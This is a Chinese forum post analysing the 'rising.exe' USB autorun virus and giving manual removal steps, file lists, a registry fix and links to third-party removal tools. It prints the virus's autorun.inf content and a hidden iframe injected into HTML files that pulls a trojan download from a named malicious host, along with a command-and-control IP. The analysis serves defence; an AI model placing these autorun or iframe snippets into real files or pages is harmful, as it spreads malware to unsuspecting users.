Rising.exe病毒专杀
[color=blue]中毒症状:[/color]在每个盘根目录下都有rising.exe和autorun.inf这两个文件,都是隐藏的,只要删掉两个文件中的任何一个,刷新又会出现两个文件。
autorun.inf文件内容:
[code][autorun]
open=rising.exe
shellexecute=rising.exe
shell\auto\command=rising.exe[/code]
目前感染此类病毒后,使用卡巴斯基,瑞星,江民都检测不到这个病毒,更无法清除。
本人在dos,安全模式下,使用各种杀毒软件,均不能杀掉。
(1)方法:
先删除rising.exe,然后马上修改autorun.inf内容,删除其内容中的“=”号后面的江西,保存。这样就不会出现rising.exe,记住,只能保存,更不要删除autorun.inf文件或更名,一旦这样做,rising.exe又会出现。再使用本站的[超级巡警之u盘和系统盘病毒免疫器v1.1正式版]免疫。但不太彻底。
(2)经测试:
请使用auto病毒专杀v2.0正式版可查杀此病毒,但务必请在安全模式下查杀。
可查看5种此类变种病毒!!
1.改进杀毒引擎,增强未知病毒查杀能力
2.增加查杀rising.exe病毒及其5种变种
3.增加修复无法进入安全模式
1.30秒闪电查杀 ravmone、rose、sxs、oso 等几十种通过u盘传播的autorun病毒
2.查杀未知autorun病毒
3.完美解决双击无法打开磁盘的问题
4.对系统实行主动防御,自动检测清除插入u盘内的病毒,从根本上杜绝病毒通过u盘感染电脑
5.解除u盘锁定状态,解决拔出时无法停止设备的问题!
6.禁止自动运行和免疫autorun病毒!
7.拦截中文上网、雅虎助手等多种恶意插件安装!
8.12小时内处理上报病毒!
auto病毒专杀 v2.0正式版 下载地址:
http://hi.baidu.com/kongie/blog/item/752666389705872296ddd81e.html 今天发现此种病毒求助者见多 收到样本后 利马测试了一下
该病毒就是前些日子流行的 修改系统时间的病毒之变种
此次变种可谓是集n种破坏性病毒之大成了
主要破坏功能有:1.感染exe 并使得被感染的exe的公司等属性变为 番茄花园
2.感染html asp 等文件 插入恶意代码
3.通过双击磁盘启动
4.下载木马,盗取网游帐号
5.修改注册表 使系统无法显示隐藏文件
6.通过hook api 函数 导致任务管理器中 无法看见其进程
分析报告如下:
[i][i]file:[/i][/i]rising.exe
size: 64775 bytes
file version: 1.00
md5: 86311b37d938bb35645e7b092014dd63
sha1: 47c324a5a691dd31dc0410e51adbd35065e6c7c3
crc32: 88abbd9b
病毒行为分析:
1.rising.exe运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他
之后 释放139ca82a.exe 139ca82a.dll(随机的8个数字字母组合成的文件名)到系统文件夹
注册服务139ca82a.exe
139ca82a.exe控制winlogon进程 使得139ca82a.dll插入几乎所有进程
2.释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动
3.感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园(被感染的exe运行后 会释放risng.exe和一个和被感染文件同名的扩展名为eve的文件,其实那个eve的文件就是被感染文件的源文件)
4.感染 html asp 等文件 在其后面插入代码
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>
http://web.yulett.cn/count.htm下载的是http://www.xxxxsou8.cn/update3.exe
经检测也是 rising.exe
5.修改系统时间 随机把年份往前调 月,日不变
6.修改 hklm\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue:
值为 0x00000000
导致无法显示隐藏文件
rising.exe 还会hook 多个 api函数 使其进程在任务管理器中隐藏
7.使用explorer.exe连接网络 61.152.92.98:80下载木马
下载的木马一般为k117815xxxxx.exe
xxxxx代表随机
到系统文件夹
由于 每台机器上下载的木马的名称不同 但最后结果相同 所以中间释放的过程省略
最后 这些木马运行后分别释放了如下文件
c:\windows\system32\buchehuo.exe(创建了服务inetsvr)
c:\windows\system32\cmdbs.dll
c:\windows\cmdbs.exe
c:\windows\system32\kvsc3.dll
c:\windows\kvsc3.exe
c:\windows\system32\mppds.dll
c:\windows\mppds.exe
c:\windows\system32\msccrt.dll
c:\windows\msccrt.exe
c:\windows\system32\winform.dll
c:\windows\winform.exe
c:\windows\system32\winsock.exe
c:\windows\cnzz.exe
c:\windows\system32\cnzz.dll
c:\windows下分别释放 类似sysxxxx的文件夹 里面一般有两个文件 一个是svchost.exe
一个hook.dll
xxxx(代表数字或者字母的组合)
临时文件夹下 释放upxdnd.exe和upxdnd.dll
解决办法:
安全模式下(开机后不断 按f8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
首先把系统日期 改回来
然后打开sreng
启动项目 注册表 删除如下项目
<upxdnd><c:\docume~1\admini~1\locals~1\temp\upxdnd.exe> []
<msccrt><c:\windows\msccrt.exe> []
<cmdbs><c:\windows\cmdbs.exe> []
<mppds><c:\windows\mppds.exe> []
<kvsc3><c:\windows\kvsc3.exe> []
<winform><c:\windows\winform.exe> []
<cnzz><c:\windows\cnzz.exe /i> []
<c:\windows\sysxxxx\svchost.exe> [n/a]
“启动项目”-“服务”-“win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
139ca82a / 139ca82a
wireless zero conflguration / inetsvr
把下面的 代码拷入记事本中然后另存为1.reg文件
windows registry editor version 5.00
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"regpath"="software\\microsoft\\windows\\currentversion\\explorer\\advanced"
"text"="@shell32.dll,-30500"
"type"="radio"
"checkedvalue"=dword:00000001
"valuename"="hidden"
"defaultvalue"=dword:00000002
"hkeyroot"=dword:80000001
"helpid"="shell.hlp#51105"
双击1.reg把这个注册表项导入
然后双击我的电脑-工具-文件夹选项-查看-显示所有文件和文件夹,把“隐藏受保护的系统文件”的勾去掉。
右键 点击c盘 点击右键菜单中的“打开”打开c盘 (千万不要双击)(如图)
删除 如下文件
c:\rising.exe
c:\autorun.inf
c:\windows\system32\buchehuo.exe
c:\windows\system32\cmdbs.dll
c:\windows\cmdbs.exe
c:\windows\system32\kvsc3.dll
c:\windows\kvsc3.exe
c:\windows\system32\mppds.dll
c:\windows\mppds.exe
c:\windows\system32\msccrt.dll
c:\windows\msccrt.exe
c:\windows\system32\winform.dll
c:\windows\winform.exe
c:\windows\system32\winsock.exe
c:\windows\unspapik.txt
c:\windows\wiasevct.txt
c:\windows\wiasvctr.txt
c:\windows\ganran.txt
c:\windows\cnzz.exe
c:\windows\system32\cnzz.dll
c:\windows\sysxxxx文件夹
c:\windows\system32\139ca82a.dll(随机的8个数字字母组合成的文件名)
c:\windows\system32\139ca82a.exe(随机的8个数字字母组合成的文件名)
c:\windows\system32\k117815xxxxx.exe(xxxxx代表随机数字)
清空c:\documents and settings\用户名\local settings\temp
右键 点击分别打开系统分区以外的分区 还是点击右键菜单中的“打开” (千万不要双击)
删除每个分区下面的autorun.inf和rising.exe文件
最后使用专杀 全盘杀毒
下载地址
http://free.ys168.com/?newcenturysun 我的网盘
威金熊猫番茄专杀 下面的威金熊猫通用终结器
之所以使用该专杀 修复文件 是因为他的感染机理与 威金相同 都是文件捆绑 关于被病毒感染的exe的手工修复请看
http://hi.baidu.com/newcenturysun/blog/item/a919b8af270421cd7dd92a6e.html
声明:此专杀只是修复exe文件 而不针对 rising.exe文件 以及他们下载的木马 所以必须在彻底清除了 rising.exe 以及所有木马后在安全模式下使用
sreng下载地址
http://www.kztechs.com/sreng/download.html
5.5又发现有下新的木马 清除方法已更新
5.7整理帖子 并修正部分错误
[img]http://www.zhumeng.org/attachments/fileType/jpg.gif[/img]此主题相关图片
[url=http://www.zhumeng.org/attachments/2007/05/12/221319.jpg][img]http://www.zhumeng.org/attachments/2007/05/12/221319s.jpg[/img][/url]
被感染的exe文件 的属性
[img]http://www.zhumeng.org/attachments/fileType/jpg.gif[/img]此主题相关图片
[url=http://www.zhumeng.org/attachments/2007/05/12/221354.jpg][img]http://www.zhumeng.org/attachments/2007/05/12/221354s.jpg[/img][/url]
下载的一些木马
[img]http://www.zhumeng.org/attachments/fileType/jpg.gif[/img]此主题相关图片
[url=http://www.zhumeng.org/attachments/2007/05/12/221423.jpg][img]http://www.zhumeng.org/attachments/2007/05/12/221423s.jpg[/img][/url] 我先下来再说 呵呵 支持shillan
页:
[1]